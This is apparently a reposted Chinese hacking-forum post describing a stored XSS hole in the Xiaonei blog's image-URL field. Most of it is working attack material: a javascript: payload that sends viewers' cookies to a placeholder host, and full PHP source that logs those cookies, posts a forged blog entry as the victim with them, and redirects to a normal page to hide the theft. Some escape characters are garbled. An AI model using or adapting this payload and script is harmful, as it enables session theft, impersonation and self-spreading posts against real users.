From:http://t00ls.net/viewthread.php?tid=1323&highlight=

校内网在发blog时对插入图片过滤不严格，存在xss漏洞.

在发blog时将插入图片URL写为如下代码即可触发：普通浏览复制代码打印代码

javascript:window.location.href='http://www.xxx.com/test.<SPAN class=t_tag xxxxx=tagshow(event) href="tag.php?name=php">php</SPAN>?cookie='+document.cookie

javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码

<?php

ob_start();

$url = 'blog.xiaonei.com';

$cookie=$_GET['cookie'];

$cookie1=$cookie."rnrn";

fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt

//发一条伪造的日志，这条日志里面也可以插入恶意代码

$sock = fsockopen("$url", 80, $errno, $errstr, 30);

if (!$sock) die("$errstr ($errno)n");

$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";

fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1rn");

fwrite($sock, "Accept: */*rn");

fwrite($sock, "Referer: http://$urlrn");

fwrite($sock, "Accept-Language: zh-cnrn");

fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");

fwrite($sock, "Accept-Encoding: gzip, deflatern");

fwrite($sock, "User-Agent: Mozillarn");

fwrite($sock, "Host: $urlrn");

fwrite($sock, "Content-Length: ".strlen($data)."rn");

fwrite($sock, "Connection: Keep-Alivern");

fwrite($sock, "Cache-Control: no-cachern");

fwrite($sock, "Cookie:".$cookie."rnrn");

fwrite($sock, $data);

$headers = "";

while ($str = trim(fgets($sock, 4096)))

$headers .= "$strn";

echo "n";

$body = "";

while (!feof($sock))

$body .= fgets($sock, 4096);

fclose($sock);

//echo $body;

//跳转到一个正常的日志

Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");

ob_end_flush();

?>